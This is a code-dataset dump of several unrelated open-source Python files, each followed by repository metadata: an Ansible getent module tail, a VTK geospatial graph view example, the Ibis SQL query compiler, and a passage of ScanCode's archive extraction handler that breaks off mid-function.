# more than one result for same key, ensure we store in a list
if seen[record[0]] == 1:
results[dbtree][record[0]] = [results[dbtree][record[0]]]
results[dbtree][record[0]].append(record[1:])
seen[record[0]] += 1
else:
# new key/value, just assign
results[dbtree][record[0]] = record[1:]
seen[record[0]] = 1
module.exit_json(ansible_facts=results)
elif rc == 1:
msg = "Missing arguments, or database unknown."
elif rc == 2:
msg = "One or more supplied key could not be found in the database."
if not fail_key:
results[dbtree][key] = None
module.exit_json(ansible_facts=results, msg=msg)
elif rc == 3:
msg = "Enumeration not supported on this database."
module.fail_json(msg=msg)
if __name__ == '__main__':
main()
|
privateip/ansible
|
lib/ansible/modules/getent.py
|
Python
|
gpl-3.0
| 5,521
|
[
"Brian"
] |
1c40bfb430509851ce2d98d95a9453780cc8fff9160a61b5d2a58c187dba3f4f
|
from vtk import *
import os.path
data_dir = "../../../../VTKData/Data/Infovis/Images/"
if not os.path.exists(data_dir):
data_dir = "../../../../../VTKData/Data/Infovis/Images/"
source = vtkGeoRandomGraphSource()
source.DirectedOff()
source.SetNumberOfVertices(100)
source.SetEdgeProbability(0.00) # produces a tree
source.SetUseEdgeProbability(True)
source.AllowParallelEdgesOn()
source.AllowSelfLoopsOn()
source.SetStartWithTree(True)
# Create a 3D geospatial view
view = vtkGeoView()
view.GetRenderWindow().SetSize(600, 600)
# Create the background image
reader = vtkJPEGReader()
reader.SetFileName(data_dir + "NE2_ps_bath.jpg")
reader.Update()
view.AddDefaultImageRepresentation(reader.GetOutput())
# Create graph
graph_rep = vtkRenderedGraphRepresentation()
graph_rep.SetInputConnection(source.GetOutputPort())
graph_rep.SetVertexColorArrayName("vertex id")
graph_rep.ColorVerticesByArrayOn()
graph_rep.SetEdgeColorArrayName("edge id")
graph_rep.ColorEdgesByArrayOn()
graph_rep.SetVertexLabelArrayName("vertex id")
graph_rep.VertexLabelVisibilityOn()
graph_rep.SetLayoutStrategyToAssignCoordinates("longitude", "latitude", None)
strategy = vtkGeoEdgeStrategy()
strategy.SetExplodeFactor(.1)
graph_rep.SetEdgeLayoutStrategy(strategy)
view.AddRepresentation(graph_rep)
# Make a normal graph layout view
view2 = vtkGraphLayoutView()
view2.GetRenderWindow().SetSize(600, 600)
view2.AddRepresentationFromInputConnection(source.GetOutputPort())
view2.SetVertexColorArrayName("vertex id")
view2.ColorVerticesOn()
view2.SetEdgeColorArrayName("edge id")
view2.ColorEdgesOn()
view2.SetVertexLabelArrayName("vertex id")
view2.VertexLabelVisibilityOn()
# Apply a theme to the views
theme = vtkViewTheme.CreateMellowTheme()
theme.SetLineWidth(4)
theme.SetPointSize(8)
theme.SetCellSaturationRange(.5,.5)
theme.SetSelectedCellColor(1,0,1)
theme.SetSelectedPointColor(1,0,1)
view.ApplyViewTheme(theme)
graph_rep.ApplyViewTheme(theme)
view2.ApplyViewTheme(theme)
theme.FastDelete()
link = vtkAnnotationLink()
graph_rep.SetAnnotationLink(link)
view2.GetRepresentation(0).SetAnnotationLink(link)
updater = vtkViewUpdater()
updater.AddView(view)
updater.AddView(view2)
view.ResetCamera()
view2.ResetCamera()
view.Render()
view2.Render()
view.GetInteractor().Initialize()
view.GetInteractor().Start()
|
collects/VTK
|
Examples/Infovis/Python/geoview.py
|
Python
|
bsd-3-clause
| 2,300
|
[
"VTK"
] |
9e98441eddf8c8e6be78590f3116ed5adc38176a6fbb1ac36aabcba910e3e4c0
|
# Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import defaultdict
import ibis.common as com
import ibis.expr.analysis as L
import ibis.expr.operations as ops
import ibis.expr.types as ir
from ibis.sql.context import QueryContext
import ibis.sql.ddl as ddl
import ibis.sql.transforms as transforms
import ibis.util as util
def build_ast(expr, context=None):
builder = QueryBuilder(expr, context=context)
return builder.get_result()
def _get_query(expr, context):
ast = build_ast(expr, context)
query = ast.queries[0]
context = ast.context
return query, context
def to_sql(expr, context=None):
query, context = _get_query(expr, context)
return query.compile(context)
# ---------------------------------------------------------------------
class QueryAST(object):
def __init__(self, context, queries):
self.context = context
self.queries = queries
class QueryBuilder(object):
def __init__(self, expr, context=None):
self.expr = expr
if context is None:
context = QueryContext()
self.context = context
def get_result(self):
op = self.expr.op()
# TODO: any setup / teardown DDL statements will need to be done prior
# to building the result set-generating statements.
if isinstance(op, ops.Union):
query = self._make_union()
else:
query = self._make_select()
return QueryAST(self.context, [query])
def _make_union(self):
op = self.expr.op()
return ddl.Union(op.left, op.right, distinct=op.distinct,
context=self.context)
def _make_select(self):
builder = SelectBuilder(self.expr, self.context)
return builder.get_result()
class SelectBuilder(object):
"""
Transforms expression IR to a query pipeline (potentially multiple
queries). There will typically be a primary SELECT query, perhaps with some
subqueries and other DDL to ingest and tear down intermediate data sources.
Walks the expression tree and catalogues distinct query units, builds
select statements (and other DDL types, where necessary), and records
relevant query unit aliases to be used when actually generating SQL.
"""
def __init__(self, expr, context):
self.expr = expr
self.query_expr, self.result_handler = _adapt_expr(self.expr)
self.sub_memo = {}
self.context = context
self.queries = []
self.table_set = None
self.select_set = None
self.group_by = None
self.having = None
self.filters = []
self.limit = None
self.sort_by = []
self.subqueries = []
self.distinct = False
self.op_memo = util.IbisSet()
def get_result(self):
# make idempotent
if len(self.queries) > 0:
return self._wrap_result()
# Generate other kinds of DDL statements that may be required to
# execute the passed query. For example, loding
setup_queries = self._generate_setup_queries()
# Make DDL statements to be executed after the main primary select
# statement(s)
teardown_queries = self._generate_teardown_queries()
select_query = self._build_result_query()
self.queries.extend(setup_queries)
self.queries.append(select_query)
self.queries.extend(teardown_queries)
return select_query
def _generate_setup_queries(self):
return []
def _generate_teardown_queries(self):
return []
def _build_result_query(self):
self._collect_elements()
self._analyze_select_exprs()
self._analyze_filter_exprs()
self._analyze_subqueries()
self._populate_context()
return ddl.Select(self.context, self.table_set, self.select_set,
subqueries=self.subqueries,
where=self.filters,
group_by=self.group_by,
having=self.having,
limit=self.limit,
order_by=self.sort_by,
distinct=self.distinct,
result_handler=self.result_handler,
parent_expr=self.query_expr)
def _populate_context(self):
# Populate aliases for the distinct relations used to output this
# select statement.
if self.table_set is not None:
self._make_table_aliases(self.table_set)
# XXX: This is a temporary solution to the table-aliasing / correlated
# subquery problem. Will need to revisit and come up with a cleaner
# design (also as one way to avoid pathological naming conflicts; for
# example, we could define a table alias before we know that it
# conflicts with the name of a table used in a subquery, join, or
# another part of the query structure)
# There may be correlated subqueries inside the filters, requiring that
# we use an explicit alias when outputting as SQL. For now, we're just
# going to see if any table nodes appearing in the where stack have
# been marked previously by the above code.
for expr in self.filters:
needs_alias = _foreign_ref_check(self, expr)
if needs_alias:
self.context.set_always_alias()
def _make_table_aliases(self, expr):
ctx = self.context
node = expr.op()
if isinstance(node, ops.Join):
for arg in node.args:
if not isinstance(arg, ir.TableExpr):
continue
self._make_table_aliases(arg)
else:
if not ctx.is_extracted(expr):
ctx.make_alias(expr)
# ---------------------------------------------------------------------
# Expr analysis / rewrites
def _analyze_select_exprs(self):
new_select_set = []
for expr in self.select_set:
new_expr = self._visit_select_expr(expr)
new_select_set.append(new_expr)
self.select_set = new_select_set
def _visit_select_expr(self, expr):
op = expr.op()
method = '_visit_select_{0}'.format(type(op).__name__)
if hasattr(self, method):
f = getattr(self, method)
return f(expr)
unchanged = True
if isinstance(op, ops.ValueNode):
new_args = []
for arg in op.args:
if isinstance(arg, ir.Expr):
new_arg = self._visit_select_expr(arg)
if arg is not new_arg:
unchanged = False
new_args.append(new_arg)
else:
new_args.append(arg)
if not unchanged:
return expr._factory(type(op)(*new_args))
else:
return expr
else:
return expr
def _visit_select_Histogram(self, expr):
op = expr.op()
EPS = 1e-13
if op.binwidth is None or op.base is None:
aux_hash = op.aux_hash or util.guid()[:6]
min_name = 'min_%s' % aux_hash
max_name = 'max_%s' % aux_hash
minmax = self.table_set.aggregate([op.arg.min().name(min_name),
op.arg.max().name(max_name)])
self.table_set = self.table_set.cross_join(minmax)
if op.base is None:
base = minmax[min_name] - EPS
else:
base = op.base
binwidth = (minmax[max_name] - base) / (op.nbins - 1)
else:
# Have both a bin width and a base
binwidth = op.binwidth
base = op.base
bucket = (op.arg - base) / binwidth
return bucket.floor().name(expr._name)
def _analyze_filter_exprs(self):
# What's semantically contained in the filter predicates may need to be
# rewritten. Not sure if this is the right place to do this, but a
# starting point
# Various kinds of semantically valid WHERE clauses may need to be
# rewritten into a form that we can actually translate into valid SQL.
new_where = []
for expr in self.filters:
new_expr = self._visit_filter(expr)
# Transformations may result in there being no outputted filter
# predicate
if new_expr is not None:
new_where.append(new_expr)
self.filters = new_where
def _visit_filter(self, expr):
# Dumping ground for analysis of WHERE expressions
# - Subquery extraction
# - Conversion to explicit semi/anti joins
# - Rewrites to generate subqueries
op = expr.op()
method = '_visit_filter_{0}'.format(type(op).__name__)
if hasattr(self, method):
f = getattr(self, method)
return f(expr)
unchanged = True
if isinstance(expr, ir.ScalarExpr):
if ops.is_reduction(expr):
return self._rewrite_reduction_filter(expr)
if isinstance(op, ops.BinaryOp):
left = self._visit_filter(op.left)
right = self._visit_filter(op.right)
unchanged = left is op.left and right is op.right
if not unchanged:
return type(expr)(type(op)(left, right))
else:
return expr
elif isinstance(op, (ops.Any, ops.BooleanValueOp,
ops.TableColumn, ir.Literal)):
return expr
elif isinstance(op, ops.ValueNode):
visited = [self._visit_filter(arg)
if isinstance(arg, ir.Expr) else arg
for arg in op.args]
unchanged = True
for new, old in zip(visited, op.args):
if new is not old:
unchanged = False
if not unchanged:
return type(expr)(type(op)(*visited))
else:
return expr
else:
raise NotImplementedError(type(op))
def _rewrite_reduction_filter(self, expr):
# Find the table that this reduction references.
# TODO: what about reductions that reference a join that isn't visible
# at this level? Means we probably have the wrong design, but will have
# to revisit when it becomes a problem.
aggregation = _reduction_to_aggregation(expr, agg_name='tmp')
return aggregation.to_array()
def _visit_filter_Any(self, expr):
# Rewrite semi/anti-join predicates in way that can hook into SQL
# translation step
transform = transforms.AnyToExistsTransform(self.context, expr,
self.table_set)
return transform.get_result()
_visit_filter_NotAny = _visit_filter_Any
def _visit_filter_TopK(self, expr):
# Top K is rewritten as an
# - aggregation
# - sort by
# - limit
# - left semi join with table set
metric_name = '__tmp__'
op = expr.op()
metrics = [op.by.name(metric_name)]
arg_table = L.find_base_table(op.arg)
by_table = L.find_base_table(op.by)
if arg_table.equals(by_table):
agg = arg_table.aggregate(metrics, by=[op.arg])
else:
agg = self.table_set.aggregate(metrics, by=[op.arg])
rank_set = agg.sort_by([(metric_name, False)]).limit(op.k)
pred = (op.arg == getattr(rank_set, op.arg.get_name()))
self.table_set = self.table_set.semi_join(rank_set, [pred])
return None
# ---------------------------------------------------------------------
# Analysis of table set
def _collect_elements(self):
# If expr is a ValueExpr, we must seek out the TableExprs that it
# references, build their ASTs, and mark them in our QueryContext
# For now, we need to make the simplifying assumption that a value
# expression that is being translated only depends on a single table
# expression.
source_expr = self.query_expr
# hm, is this the best place for this?
root_op = source_expr.op()
if (isinstance(root_op, ops.Join) and
not isinstance(root_op, ops.MaterializedJoin)):
# Unmaterialized join
source_expr = source_expr.materialize()
if isinstance(root_op, ops.TableNode):
self._collect(source_expr, toplevel=True)
if self.table_set is None:
raise com.InternalError('no table set')
else:
if isinstance(root_op, ir.ExpressionList):
self.select_set = source_expr.exprs()
else:
self.select_set = [source_expr]
def _collect(self, expr, toplevel=False):
op = expr.op()
method = '_collect_{0}'.format(type(op).__name__)
# Do not visit nodes twice
if op in self.op_memo:
return
if hasattr(self, method):
f = getattr(self, method)
f(expr, toplevel=toplevel)
elif isinstance(op, (ops.PhysicalTable, ops.SQLQueryResult)):
self._collect_PhysicalTable(expr, toplevel=toplevel)
elif isinstance(op, (ops.Join, ops.MaterializedJoin)):
self._collect_Join(expr, toplevel=toplevel)
else:
raise NotImplementedError(type(op))
self.op_memo.add(op)
def _collect_Aggregation(self, expr, toplevel=False):
# The select set includes the grouping keys (if any), and these are
# duplicated in the group_by set. SQL translator can decide how to
# format these depending on the database. Most likely the
# GROUP BY 1, 2, ... style
if toplevel:
subbed_expr = self._sub(expr)
sub_op = subbed_expr.op()
self.group_by = range(len(sub_op.by))
self.having = sub_op.having
self.select_set = sub_op.by + sub_op.agg_exprs
self.table_set = sub_op.table
self._collect(expr.op().table)
def _collect_Distinct(self, expr, toplevel=False):
if toplevel:
self.distinct = True
self._collect(expr.op().table, toplevel=toplevel)
def _collect_Filter(self, expr, toplevel=False):
op = expr.op()
self.filters.extend(op.predicates)
if toplevel:
self.select_set = [op.table]
self.table_set = op.table
self._collect(op.table)
def _collect_Limit(self, expr, toplevel=False):
if not toplevel:
return
op = expr.op()
self.limit = {
'n': op.n,
'offset': op.offset
}
self._collect(op.table, toplevel=toplevel)
def _collect_SortBy(self, expr, toplevel=False):
op = expr.op()
self.sort_by = op.keys
if toplevel:
# HACK: yuck, need a better way to know if we should perform a
# select * from a subquery here
if not isinstance(op.table.op(), ops.Aggregation):
self.select_set = [op.table]
self.table_set = op.table
toplevel = False
self._collect(op.table, toplevel=toplevel)
def _collect_Join(self, expr, toplevel=False):
op = expr.op()
if isinstance(op, ops.MaterializedJoin):
expr = op.join
op = expr.op()
if toplevel:
subbed = self._sub(expr)
self.table_set = subbed
self.select_set = [op.left, op.right]
self._collect(op.left, toplevel=False)
self._collect(op.right, toplevel=False)
def _collect_Union(self, expr, toplevel=False):
if not toplevel:
return
else:
raise NotImplementedError
def _collect_Projection(self, expr, toplevel=False):
op = expr.op()
if toplevel:
subbed = self._sub(expr)
sop = subbed.op()
self.select_set = sop.selections
self.table_set = sop.table
self._collect(op.table)
def _collect_PhysicalTable(self, expr, toplevel=False):
if toplevel:
self.select_set = [expr]
self.table_set = self._sub(expr)
def _collect_SelfReference(self, expr, toplevel=False):
op = expr.op()
if toplevel:
self._collect(op.table, toplevel=toplevel)
def _sub(self, what):
if isinstance(what, list):
return [L.substitute_parents(x, self.sub_memo) for x in what]
else:
return L.substitute_parents(what, self.sub_memo)
# --------------------------------------------------------------------
# Subquery analysis / extraction
def _analyze_subqueries(self):
# Somewhat temporary place for this. A little bit tricky, because
# subqueries can be found in many places
# - With the table set
# - Inside the where clause (these may be able to place directly, some
# cases not)
# - As support queries inside certain expressions (possibly needing to
# be extracted and joined into the table set where they are
# used). More complex transformations should probably not occur here,
# though.
#
# Duplicate subqueries might appear in different parts of the query
# structure, e.g. beneath two aggregates that are joined together, so
# we have to walk the entire query structure.
#
# The default behavior is to only extract into a WITH clause when a
# subquery appears multiple times (for DRY reasons). At some point we
# can implement a more aggressive policy so that subqueries always
# appear in the WITH part of the SELECT statement, if that's what you
# want.
# Find the subqueries, and record them in the passed query context.
subqueries = _extract_subqueries(self)
self.subqueries = []
for expr in subqueries:
# See #173. Might have been extracted already in a parent context.
if not self.context.is_extracted(expr):
self.subqueries.append(expr)
self.context.set_extracted(expr)
def _extract_subqueries(select_stmt):
helper = _ExtractSubqueries(select_stmt)
return helper.get_result()
def _extract_noop(self, expr):
return
class _ExtractSubqueries(object):
# Helper class to make things a little easier
def __init__(self, query, greedy=False):
self.query = query
self.greedy = greedy
# Ordered set that uses object .equals to find keys
self.observed_exprs = util.IbisMap()
self.expr_counts = defaultdict(lambda: 0)
def get_result(self):
if self.query.table_set is not None:
self.visit(self.query.table_set)
for clause in self.query.filters:
self.visit(clause)
to_extract = []
# Read them inside-out, to avoid nested dependency issues
for expr, key in reversed(zip(self.observed_exprs.keys,
self.observed_exprs.values)):
v = self.expr_counts[key]
if self.greedy or v > 1:
to_extract.append(expr)
return to_extract
def observe(self, expr):
if expr in self.observed_exprs:
key = self.observed_exprs.get(expr)
else:
# this key only needs to be unique because of the IbisMap
key = id(expr.op())
self.observed_exprs.set(expr, key)
self.expr_counts[key] += 1
def _has_been_observed(self, expr):
return expr in self.observed_exprs
def visit(self, expr):
node = expr.op()
method = '_visit_{0}'.format(type(node).__name__)
if hasattr(self, method):
f = getattr(self, method)
f(expr)
elif isinstance(node, ops.Join):
self._visit_join(expr)
elif isinstance(node, ops.PhysicalTable):
self._visit_physical_table(expr)
elif isinstance(node, ops.ValueNode):
for arg in node.flat_args():
if not isinstance(arg, ir.Expr):
continue
self.visit(arg)
else:
raise NotImplementedError(type(node))
def _visit_join(self, expr):
node = expr.op()
self.visit(node.left)
self.visit(node.right)
_visit_physical_table = _extract_noop
_visit_ExistsSubquery = _extract_noop
_visit_NotExistsSubquery = _extract_noop
def _visit_Aggregation(self, expr):
self.observe(expr)
self.visit(expr.op().table)
def _visit_Distinct(self, expr):
self.observe(expr)
def _visit_Filter(self, expr):
self.visit(expr.op().table)
def _visit_Limit(self, expr):
self.visit(expr.op().table)
def _visit_Union(self, expr):
self.observe(expr)
def _visit_Projection(self, expr):
self.observe(expr)
self.visit(expr.op().table)
def _visit_SQLQueryResult(self, expr):
self.observe(expr)
def _visit_TableColumn(self, expr):
table = expr.op().table
if not self._has_been_observed(table):
self.visit(table)
def _visit_SelfReference(self, expr):
self.visit(expr.op().table)
def _visit_SortBy(self, expr):
self.observe(expr)
self.visit(expr.op().table)
def _foreign_ref_check(query, expr):
checker = _CorrelatedRefCheck(query, expr)
return checker.get_result()
class _CorrelatedRefCheck(object):
def __init__(self, query, expr):
self.query = query
self.ctx = query.context
self.expr = expr
qroots = self.query.table_set._root_tables()
self.query_roots = util.IbisSet.from_list(qroots)
# aliasing required
self.foreign_refs = []
self.has_foreign_root = False
self.has_query_root = False
def get_result(self):
self._visit(self.expr)
return self.has_query_root and self.has_foreign_root
def _visit(self, expr, in_subquery=False):
node = expr.op()
in_subquery = self._is_subquery(node)
for arg in node.flat_args():
if isinstance(arg, ir.TableExpr):
self._visit_table(arg, in_subquery=in_subquery)
elif isinstance(arg, ir.Expr):
self._visit(arg, in_subquery=in_subquery)
else:
continue
def _is_subquery(self, node):
# XXX
if isinstance(node, ops.TableArrayView):
return True
if isinstance(node, ops.TableColumn):
return not self._is_root(node.table)
return False
def _visit_table(self, expr, in_subquery=False):
node = expr.op()
if isinstance(node, (ops.PhysicalTable, ops.SelfReference)):
self._ref_check(node, in_subquery=in_subquery)
for arg in node.flat_args():
if isinstance(arg, ir.Expr):
self._visit(arg, in_subquery=in_subquery)
def _ref_check(self, node, in_subquery=False):
is_aliased = self.ctx.has_alias(node)
if self._is_root(node):
if in_subquery:
self.has_query_root = True
else:
if in_subquery:
self.has_foreign_root = True
if (not is_aliased and
self.ctx.has_alias(node, parent_contexts=True)):
self.ctx.make_alias(node)
elif not self.ctx.has_alias(node):
self.ctx.make_alias(node)
def _is_root(self, what):
if isinstance(what, ir.Expr):
what = what.op()
return what in self.query_roots
def _adapt_expr(expr):
# Non-table expressions need to be adapted to some well-formed table
# expression, along with a way to adapt the results to the desired
# arity (whether array-like or scalar, for example)
#
# Canonical case is scalar values or arrays produced by some reductions
# (simple reductions, or distinct, say)
def as_is(x):
return x
if isinstance(expr, ir.TableExpr):
return expr, as_is
def _scalar_reduce(x):
return isinstance(x, ir.ScalarExpr) and ops.is_reduction(x)
if isinstance(expr, ir.ScalarExpr):
def scalar_handler(results):
return results['tmp'][0]
if _scalar_reduce(expr):
table_expr = _reduction_to_aggregation(expr, agg_name='tmp')
return table_expr, scalar_handler
else:
base_table = L.find_base_table(expr)
if base_table is None:
# expr with no table refs
return expr.name('tmp'), scalar_handler
else:
raise NotImplementedError(expr._repr())
elif isinstance(expr, ir.ExprList):
exprs = expr.exprs()
is_aggregation = True
any_aggregation = False
for x in exprs:
if not _scalar_reduce(x):
is_aggregation = False
else:
any_aggregation = True
if is_aggregation:
table = L.find_base_table(exprs[0])
return table.aggregate(exprs), as_is
elif not any_aggregation:
return expr, as_is
else:
raise NotImplementedError(expr._repr())
elif isinstance(expr, ir.ArrayExpr):
op = expr.op()
def _get_column(name):
def column_handler(results):
return results[name]
return column_handler
if isinstance(op, ops.TableColumn):
table_expr = op.table
result_handler = _get_column(op.name)
else:
# Something more complicated.
base_table = L.find_source_table(expr)
if isinstance(op, ops.DistinctArray):
expr = op.arg
try:
name = op.arg.get_name()
except Exception:
name = 'tmp'
table_expr = (base_table.projection([expr.name(name)])
.distinct())
result_handler = _get_column(name)
else:
table_expr = base_table.projection([expr.name('tmp')])
result_handler = _get_column('tmp')
return table_expr, result_handler
else:
raise NotImplementedError
def _reduction_to_aggregation(expr, agg_name='tmp'):
table = L.find_base_table(expr)
return table.aggregate([expr.name(agg_name)])
|
o0neup/ibis
|
ibis/sql/compiler.py
|
Python
|
apache-2.0
| 27,343
|
[
"VisIt"
] |
90b7b6f5a2a29b35a3d4c55adbe8c09b690e674d94c00273e4cd5f4177c2ca43
|
#
# Copyright (c) 2016 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from collections import namedtuple
import functools
import logging
import os
from commoncode import fileutils
from commoncode import filetype
import typecode
from extractcode import all_kinds
from extractcode import regular
from extractcode import package
from extractcode import docs
from extractcode import regular_nested
from extractcode import file_system
from extractcode import patches
from extractcode import special_package
from extractcode import patch
from extractcode import sevenzip
from extractcode import libarchive2
from extractcode.uncompress import uncompress_gzip
from extractcode.uncompress import uncompress_bzip2
logger = logging.getLogger(__name__)
TRACE = False
TRACE_DEEP = False
if TRACE:
import sys
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
"""
Archive formats handling. The purpose of this module is to select an extractor
suitable for the accurate extraction of a given kind of archive. An extractor is
a function that can read an archive and extract it to a directory. Multiple
extractors functions can be called in sequence to handle nested archives such
as tar.gz.
A handler contains selection criteria and a list of extractors.
We select an extraction handler based on these croiteria:
- file type,
- mime type,
- file extension,
- kind of archive.
Several handlers may be suitable candidates for extraction of a given archive.
Candidates are scored and the best one picked which is typically the most
specific and the one capable of doing the deepest extraction of a given archive.
At the lowest level, archives are processed by standard library code (sometimes
patched) or native code (libarchive, 7zip).
For background on archive and compressed file formats see:
- http://en.wikipedia.org/wiki/List_of_archive_formats
- http://en.wikipedia.org/wiki/List_of_file_formats#Archive_and_compressed
"""
# if strict, all hanlders criteria must be matched for it to be selected
Handler = namedtuple('Handler', ['name', 'filetypes', 'mimetypes', 'extensions', 'kind', 'extractors', 'strict'])
def can_extract(location):
"""
Return True if this location can be extracted by some handler.
"""
handlers = list(get_handlers(location))
if handlers:
return True
def should_extract(location, kinds):
"""
Return True if this location should be extracted based on the provided
kinds
"""
location = os.path.abspath(os.path.expanduser(location))
if get_extractor(location, kinds):
return True
def get_extractor(location, kinds=all_kinds):
"""
Return an extraction callable that can extract the file at location or
an None if no extract function is found.
"""
assert location
location = os.path.abspath(os.path.expanduser(location))
extractors = get_extractors(location, kinds)
if not extractors:
return None
if len(extractors) == 2:
extractor1, extractor2 = extractors
nested_extractor = functools.partial(extract_twice,
extractor1=extractor1,
extractor2=extractor2)
return nested_extractor
elif len(extractors) == 1:
return extractors[0]
else:
return None
def get_extractors(location, kinds=all_kinds):
"""
Return a list of extractors that can extract the file at
location or an empty list.
"""
handler = get_best_handler(location, kinds)
return handler and handler.extractors or []
def get_best_handler(location, kinds=all_kinds):
"""
Return the best handler of None for the file at location.
"""
location = os.path.abspath(os.path.expanduser(location))
if not filetype.is_file(location):
return
handlers = list(get_handlers(location))
if handlers:
candidates = score_handlers(handlers)
return candidates and pick_best_handler(candidates, kinds)
def get_handlers(location):
"""
Return an iterable of (handler, type_matched, mime_matched,
extension_matched,) for this `location`.
"""
if filetype.is_file(location):
T = typecode.contenttype.get_type(location)
ftype = T.filetype_file.lower()
mtype = T.mimetype_file
for handler in archive_handlers:
if not handler.extractors:
continue
extractor_count = len(handler.extractors)
if extractor_count > 2:
raise Exception('Maximum level of archive nesting is two.')
# default to False
type_matched = handler.filetypes and any(t in ftype for t in handler.filetypes)
mime_matched = handler.mimetypes and any(m in mtype for m in handler.mimetypes)
extension_matched = handler.extensions and location.lower().endswith(handler.extensions)
if TRACE_DEEP:
handler_name = handler.name
logger.debug('get_handlers: considering %(handler_name)r handler for %(location)s: ftype: %(ftype)s, mtype: %(mtype)s ' % locals())
logger.debug('get_handlers: %(location)s: matched type: %(type_matched)s, mime: %(mime_matched)s, ext: %(extension_matched)s' % locals())
if handler.strict and not all([type_matched, mime_matched, extension_matched]):
continue
if type_matched or mime_matched or extension_matched:
if TRACE_DEEP:
logger.debug('get_handlers: %(location)s: matched type: %(type_matched)s, mime: %(mime_matched)s, ext: %(extension_matched)s' % locals())
logger.debug('get_handlers: %(location)s: handler: %(handler)r' % locals())
yield handler, type_matched, mime_matched, extension_matched
def score_handlers(handlers):
"""
Score candidate handlers. Higher score is better.
"""
for handler, type_matched, mime_matched, extension_matched in handlers:
score = 0
# increment kind value: higher kinds numerical values are more
# specific by design
score += handler.kind
# increment score based on matched criteria
if type_matched and mime_matched and extension_matched:
# bump for matching all criteria
score += 10
if type_matched:
# type is more specific than mime
score += 8
if mime_matched:
score += 6
if extension_matched:
# extensions have little power
score += 2
if extension_matched and not (type_matched or mime_matched):
# extension matched alone should not be extracted
score -= 100
# increment using the number of extractors: higher score means that we
# have some kind of nested archive that we can extract in one
# operation, therefore more this is a more specific extraction that we
# should prefer. For instance we prefer uncompressing and extracting a
# tgz at once, rather than uncompressing in a first operation then
# later extracting the plain tar in a second operation
score += len(handler.extractors)
if score > 0:
yield score, handler, extension_matched
def pick_best_handler(candidates, kinds):
"""
Return the best handler with the highest score.
In case of ties, look at the top two handlers and keep:
- the handler with the most extractors (i.e. a handler that does deeper
nested extractions),
- OR the handler that has matched extensions,
- OR finally the first handler in the list.
"""
# sort by increasing scores
scored = sorted(candidates, reverse=True)
if not scored:
return
top_score, top, top_ext = scored[0]
# logger.debug('pick_best_handler: top: %(top)r\n' % locals())
# single candidate case
if len(scored) == 1:
return top if top.kind in kinds else None
# else: here we have 2 or more candidates: look at the runner up.
runner_up_score, runner_up, runner_up_ext = scored[1]
# logger.debug('pick_best_handler: runner_up: %(runner_up)r\n' % locals())
# return the top scoring if there is score ties.
if top_score > runner_up_score:
return top if top.kind in kinds else None
# else: with sorting top_score == runner_up_score by construction here
# break ties based on number of extractors
if len(top.extractors) > len(runner_up.extractors):
return top if top.kind in kinds else None
elif len(top.extractors) < len(runner_up.extractors):
return runner_up if runner_up.kind in kinds else None
# else: here len(top.extractors) == len(runner_up.extractors)
# now, break ties based on extensions being matched
if top_ext and not runner_up_ext:
return top if top.kind in kinds else None
elif runner_up_ext and not top_ext:
return runner_up if runner_up.kind in kinds else None
# else: we could not break ties. finally return the top
return top if top.kind in kinds else None
def extract_twice(location, target_dir, extractor1, extractor2):
"""
Extract a nested compressed archive at `location` to `target_dir` using
the `extractor1` function to a temporary directory then the `extractor2`
function on the extracted payload of `extractor1`.
Return a list of warning messages. Raise exceptions on errors.
Typical nested archives include compressed tarballs and RPMs (containing a
compressed cpio).
Note: it would be easy to support deeper extractor chains, but this gets
hard to trace and debug very quickly. A depth of two is simple and sane and
covers most common cases.
"""
abs_location = os.path.abspath(os.path.expanduser(location))
abs_target_dir = unicode(os.path.abspath(os.path.expanduser(target_dir)))
# extract first the intermediate payload to a temp dir
temp_target = unicode(fileutils.get_temp_dir('extract'))
warnings = extractor1(abs_location, temp_target)
if TRACE:
logger.debug('extract_twice: temp_target: %(temp_target)r' % locals())
# extract this intermediate payload to the final target_dir
try:
inner_archives = list(fileutils.file_iter(temp_target))
if not inner_archives:
warnings.append(location + ': No files found in archive.')
else:
for extracted1_loc in inner_archives:
if TRACE:
logger.debug('extract_twice: extractor2: %(extracted1_loc)r' % locals())
warnings.extend(extractor2(extracted1_loc, abs_target_dir))
finally:
# cleanup the temporary output from extractor1
fileutils.delete(temp_target)
return warnings
def extract_with_fallback(location, target_dir, extractor1, extractor2):
"""
Extract archive at `location` to `target_dir` trying first `extractor1` function.
If extract fails, attempt extraction again with the `extractor2` function.
Return a list of warning messages. Raise exceptions on errors.
Note: there are a few cases where the primary extractor for a type may fail and
a secondary extractor will succeed.
"""
abs_location = os.path.abspath(os.path.expanduser(location))
abs_target_dir = unicode(os.path.abspath(os.path.expanduser(target_dir)))
# attempt extract first to a temp dir
temp_target1 = unicode(fileutils.get_temp_dir('extract1'))
try:
warnings = extractor1(abs_location, temp_target1)
if TRACE:
logger.debug('extract_with_fallback: temp_target1: %(temp_target1)r' % locals())
fileutils.copytree(temp_target1, abs_target_dir)
except:
try:
temp_target2 = unicode(fileutils.get_temp_dir('extract2'))
warnings = extractor2(abs_location, temp_target2)
if TRACE:
